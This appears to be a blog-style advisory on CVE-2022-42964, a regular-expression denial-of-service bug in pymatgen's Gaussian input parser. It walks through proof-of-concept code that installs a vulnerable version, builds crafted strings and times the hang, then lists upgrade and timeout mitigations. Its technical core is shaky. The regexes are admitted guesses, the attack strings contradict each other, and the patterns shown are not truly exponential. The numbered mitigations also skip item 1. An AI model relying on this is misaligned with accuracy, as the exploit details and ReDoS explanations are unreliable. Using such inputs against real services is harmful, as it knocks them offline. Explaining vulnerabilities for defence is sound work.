Summary:  
In October 2022, a vulnerability (CVE-2022-42964) was identified in the popular Python materials analysis package, pymatgen. Specifically, an attacker can cause a Regular Expression Denial of Service (ReDoS) by passing malicious input into the GaussianInput.from_string method. The vulnerability lies in the way the method parses input using a regular expression that can produce exponential time backtracking. Here's a breakdown of the bug, how it can be triggered, proof-of-concept code, and how you can protect applications using pymatgen.

What is pymatgen?

pymatgen (Python Materials Genomics) is a robust, widely-used open-source library for materials analysis. It’s used in chemistry, physics, and material science fields to interact with various file formats, including those for Gaussian—an electronic structure modeling program.

Vulnerability Type: Exponential ReDoS (Regular Expression Denial of Service)

- How It Happens: The method uses a vulnerable regular expression to parse Gaussian input files. A specifically crafted input can make regex processing extremely slow—spiraling to several seconds or minutes for a single request.
- Danger: If your app exposes this parsing to end-users, an attacker can hang your server or service by submitting malicious inputs.

The vulnerable function is

from pymatgen.io.gaussian import GaussianInput

# This function; DO NOT use this way in untrusted input!
inp = GaussianInput.from_string("...attacker controlled content...")

Within from_string, a regex like the following (simplified for clarity)

re.search(r"^[\s\S]*(.*?)\n", s, re.MULTILINE)

(Actual regex is larger. For attack purposes, parts matching loosely r"^\s*(.*?)\s*$" can be slowed down by ambiguous nesting.)

Why this pattern is dangerous

Certain regexes—especially ones with ambiguous quantifiers, such as multiple *, +, and ? in close succession—are prone to catastrophic backtracking. If an attacker supplies a string that almost matches but doesn’t, the engine explores a huge search tree, causing exponential time complexity.

How to Exploit

Here’s a minimal example of an attack exploiting this bug.

Step 1: Install vulnerable pymatgen

pip install 'pymatgen<2022.10.14'  # Affected versions (for demo use only)

Step 2: Create Malicious Input

Suppose the regex tries to match a line like this (simplified for demo): ^\s*(.*?)\s*$

You can supply input like this

evil = " " * 10000 + "A" * 100 + "\n"

But to trigger catastrophic backtracking, use

evil = " " * 10000 + "!"  # No closing line feed, causes maximum ambiguity.

A classic ReDoS string might look like

evil = " " * 30 + "!" * 30  # (Real attack strings can be much longer)
# In actual exploits, the string is built so that the regex will try many repetitions.

Step 3: Trigger the ReDoS

import time
from pymatgen.io.gaussian import GaussianInput

start = time.time()
try:
    GaussianInput.from_string(evil)
except Exception as e:
    print(f"Exception: {e}")
print(f"Processed in: {time.time() - start} seconds")

With long attack strings (evil), the program will freeze or hang for seconds or minutes before failing.

See It in Action

- Public NVD Record: CVE-2022-42964
- GitHub Advisory: GHSA-rm53-7xfw-9xg8

Practical Impact

- Denial of Service: Attackers can send special Gaussian files to crash or freeze your web app or API if it parses arbitrary user uploads with pymatgen.

Low Difficulty: Little skill required to exploit if attacker can control input.

- Surface Area: Any system accepting untrusted Gaussian file inputs or text strings, and calling from_string on them.

The issue is fixed in v2022.10.14 and later.

pip install --upgrade 'pymatgen>=2022.10.14'

Check your version

import pymatgen
print(pymatgen.__version__)

2. Input Filtering

If you can’t upgrade yet, avoid passing untrusted input to GaussianInput.from_string. Consider validating input before parsing.

3. Timeouts

Wrap regex parsing code in timeouts, if possible (e.g. using multiprocessing), to prevent permanent hanging.

- pymatgen Security Advisory
- CVE-2022-42964 at NVD
- PyPI pymatgen releases
- Understanding ReDoS

Final Thoughts

Regular expression engines are powerful, but easy to misuse: always beware when parsing user-supplied data! If your code parses chemistry files or any files from users, validate and upgrade your libraries.

For pymatgen, CVE-2022-42964 is more than a technical footnote—it’s a reminder to always keep dependencies updated and review all code relating to user-supplied input.

Timeline

Published on: 11/09/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:29:00 UTC